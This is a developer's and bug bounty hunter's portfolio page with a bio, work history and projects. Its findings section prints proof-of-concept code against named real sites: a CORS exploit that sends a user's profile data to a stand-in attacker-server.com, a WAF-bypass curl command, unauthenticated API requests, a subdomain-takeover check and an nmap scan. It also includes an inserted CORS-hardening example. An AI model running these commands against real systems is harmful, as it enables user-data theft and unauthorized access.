Full-Stack Developer • Cybersecurity Expert • Part-Time Bug Bounty Hunter
I'm a passionate full-stack developer and cybersecurity enthusiast from West Bengal, India. With expertise in web development and ethical hacking, I create secure, efficient applications while hunting for vulnerabilities in my free time. Currently pursuing B.A. English at University of North Bengal while actively contributing to bug bounty platforms.
Hello! I'm Ratnadeep Bose from West Bengal, India - a dedicated full-stack developer with a passion for cybersecurity. My journey combines technical expertise in web development with the analytical mindset of a security researcher.
Academic Background: Currently pursuing B.A. English at University of North Bengal (2023-2027) with minors in History and Political Science. This interdisciplinary approach enhances my communication skills - crucial for explaining complex technical concepts to diverse audiences.
Full-Stack Development: I specialize in creating responsive, user-friendly web applications using modern technologies. My expertise spans frontend and backend development, database management, and deployment strategies.
Cybersecurity Journey: As a part-time bug bounty hunter, I actively hunt for vulnerabilities on platforms like HackerOne and Bugcrowd. My expertise includes reconnaissance, vulnerability assessment, and penetration testing using advanced tools and methodologies.
Technical Environment: I work in a multi-VM environment with Kali Linux and Windows 11, utilizing VMware for isolated testing. My workflow emphasizes both development productivity and security testing efficiency.
Professional Approach: I believe in creating secure-by-design applications, implementing best practices from the initial development phase through to deployment and maintenance.
Developing Flutter-based mobile apps for Azmth’s AI call management ecosystem.
Integrating AI voice features, analytics, and CRM sync modules for workflow automation.
Ensuring end-to-end security through encryption, code reviews, and secure authentication.
Collaborating across teams to enhance performance, reliability, and UX.
Impact: Improved app speed, data security, and AI system integration for a seamless user experience.
Skills: Flutter • Dart • RESTful APIs • Android Development • UI/UX Optimization
As the lead developer behind , a conscious luxury fashion brand, I designed and implemented the brand's full digital presence.
Built a responsive, high-performance e-commerce platform that showcases minimalist, inclusive fashion collections while ensuring seamless user experience across devices.
Integrated modern web technologies, optimized for speed, accessibility, and SEO, supporting brand storytelling and customer engagement.
Collaborated with design, branding, and marketing teams to translate its premium aesthetic into a functional and scalable digital experience.
As a Web Developer Intern, I contributed to building and maintaining websites and applications using modern web technologies. I collaborated on REST API integrations, supported front-end development, and gained hands-on experience with server management and deployment.
Impact: I strengthened my skills in web development, software deployment, and problem-solving while working on real-world projects that support local businesses and organizations.
I am currently a full-time Teaching Faculty at Gurukul Jalpaiguri, where I design and deliver interactive lessons and simplified study materials to enhance student comprehension and engagement. I mentor students in exam preparation and writing skills, helping them achieve measurable academic improvement. Additionally, I cultivate a supportive and stimulating learning environment that fosters critical thinking, creativity, and independent problem-solving.
I taught students at Gurukul Jalpaiguri, preparing interactive lessons and simplified notes to enhance their comprehension and engagement. I mentored students in exam preparation and writing skills, improving their overall academic performance. At the same time, I fostered a supportive learning environment that encourages critical thinking and creativity.
Active full-stack developer and security researcher specializing in web application development and penetration testing. Conducted reconnaissance on major targets while building secure, responsive web applications. Expert in modern web technologies and security testing methodologies.
Providing personalized coaching in arts and humanities subjects with exceptional focus on academic excellence. Developed innovative teaching methodologies combining traditional subjects with technical knowledge. Successfully mentored students in comprehensive academic development.
Pursuing Bachelor of Arts in English with History and Political Science minors. This interdisciplinary approach enhances communication skills crucial for technical documentation and client interactions. Actively integrating academic learning with practical development and security research.
Discoveries that enhanced enterprise security
Discovered critical CORS misconfiguration allowing cross-origin data theft from authenticated users on identity.porsche.com
fetch('https://identity.porsche.com/api/v2/users/me', {
  method: 'GET',
  credentials: 'include'
}).then(response => response.json())
  .then(userData => {
    // Exfiltrate sensitive user data
    fetch('https://attacker-server.com/log', {
      method: 'POST',
      body: JSON.stringify(userData)
    });
  });
Identified and demonstrated critical subdomain takeover vulnerability allowing complete control over financial service infrastructure
# Verified unclaimed AWS S3 bucket
aws s3api head-bucket --bucket "public-preprod.us-west-2.remitly.com"
# Direct access to vulnerable resource
https://s3.us-west-2.amazonaws.com/public-preprod.us-west-2.remitly.com/
Successfully bypassed web application firewall protections to access internal configuration files and security keys
# Normal request (blocked by WAF)
curl -s "https://openapiportal.m-pesa.com/config.json"
# Returns: 403 Forbidden
# WAF Bypass technique
curl -s -H "Content-Type: text/plain" "https://openapiportal.m-pesa.com/config.json"
# Returns: 200 OK with sensitive data
Uncovered unauthenticated access to internal API endpoints exposing sensitive configuration data including reCAPTCHA keys
# Extract internal configuration
curl -s "https://api-catalog.rei.com/siteid"
curl -s "https://api-catalog.rei.com/portals/api/sites/rei-prod-apicatalog/liveportal/sitemap"
Discovered permissive CORS policy exposing internal business data including vehicle configurations and pricing
curl -s "https://configurator.porsche.com/en-WW/model-start" \
  -H "Origin: https://competitor.com" \
  | grep -oP 'window\.__NEXT_DATA__ = \K\{.*\}(?=;)' \
  | jq -r '.props.pageProps.initialState.modelSeries[]'
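For the two CORS findings above (the credentialed cross-origin read and the permissive policy), a server-side sketch of the fix, added here as an example and not code from the author or the affected sites: a reflecting policy beside an exact-match allowlist, checked against a simplified model of the browser's read decision. All origins and function names are constructed for illustration.

```javascript
// Added example: constructed origins, not taken from any real deployment.
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://account.example.com',
]);

// Weak policy: echoes whatever Origin the request carried and allows cookies.
function reflectingCors(origin) {
  if (!origin) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened policy: exact-match allowlist; no wildcard, no "null", no suffix matching.
function allowlistCors(origin) {
  if (!origin || !ALLOWED_ORIGINS.has(origin)) {
    return { Vary: 'Origin' }; // no CORS grant; still vary so caches stay correct
  }
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    Vary: 'Origin',
  };
}

// Simplified model of the browser's decision: may script running on pageOrigin
// read the response to a fetch sent with or without credentials?
function scriptCanRead(headers, pageOrigin, withCredentials) {
  const acao = headers['Access-Control-Allow-Origin'];
  if (withCredentials) {
    return acao === pageOrigin && headers['Access-Control-Allow-Credentials'] === 'true';
  }
  return acao === '*' || acao === pageOrigin;
}

// Audit helper: which probe origins would be granted a credentialed read?
function grantedOrigins(policy, probes) {
  return probes.filter((o) => scriptCanRead(policy(o), o, true));
}

const PROBES = [
  'https://app.example.com',
  'https://evil.example.net',
  'https://app.example.com.evil.example.net', // look-alike host
  'null', // sandboxed iframe or file: origin
];
```

Running `grantedOrigins` over the same probe list before and after a policy change gives a quick regression check that only allowlisted origins receive a credentialed grant.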
Comprehensive security assessment revealing multiple attack vectors including SSH exposure, internal IP leaks, and email security gaps
# SSH Service Exposure
nmap -sV -p 22 sftp.remitly.io
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
Service fingerprint: SSH-2.0-AWS_SFTP_1.2
Image OCR Tool extracts text directly from your pasted or uploaded images with precision. Supports up to 50 images at once and allows instant copying of all extracted text. Ideal for scanning notes, screenshots, and documents seamlessly in the browser.
Smart Task Dashboard is a personal productivity web app designed to organize notes, tasks, and ideas efficiently. It supports user authentication with email and password, providing a secure workspace to manage projects and goals. Built for clarity, speed, and focus.
Pacman Typing Test is a retro arcade-style typing game. I worked on this project as a developer — responsible for frontend features, animations, sound effects, and performance optimizations for a smooth and fun typing experience.
Aurevo is a fast-fashion ecommerce platform. I worked on Aurevo as a developer — responsible for frontend features, product listing flows, and performance optimizations for a smooth shopping experience.
Code OCR scans an uploaded folder (any file types allowed) and extracts source code files (JS, HTML, CSS, Python, etc.) into a consolidated, searchable view. Designed to help auditing, migration, and quick code review workflows.
Enterprise-grade web, API, and cloud vulnerability scanner with 50+ checks, multi-engine recon, API testing, continuous monitoring, and professional reporting for security teams and bug bounty hunters.
JavaScript Handbook: A concise guide covering core JavaScript concepts like variables, functions, objects, DOM, events, asynchronous code, and practical projects to build real-world skills.
Ratnadeep's own academy — quality, affordable classes in English, History, Politics, and Geography for grades 6 to 12.
TOOLKIT is a collection of 50 client-side tools for Text & Document, Links & Network, Security & Development, Study & Calculator, and Media & File. All tools work directly in the browser without needing a server.
This is a fun, browser-based Whack-A-Mole game built from scratch using HTML, CSS, and JavaScript. Players must quickly hit moles as they pop up from their holes, earning points for each successful hit.
DICTIONARY by Ratnadeep Bose is a sleek, web-based dictionary designed for speed, simplicity, and elegance. Instantly search any word and get clear, precise definitions with a responsive, user-friendly interface.
Developed by Ratnadeep Bose — “Constitution Explorer” is an interactive web platform that lets users browse, search, and study the Constitution of India with ease. Every Article, Schedule, and Amendment is presented through a sleek, accessible interface.
I'm open for exciting opportunities in web development, cybersecurity collaborations, and educational technology projects. Whether you need a full-stack application, security assessment, or custom software solution, let's connect!
Specializations: Full-stack development, bug bounty hunting, web application security, educational technology, and custom software solutions. Available for remote collaborations worldwide.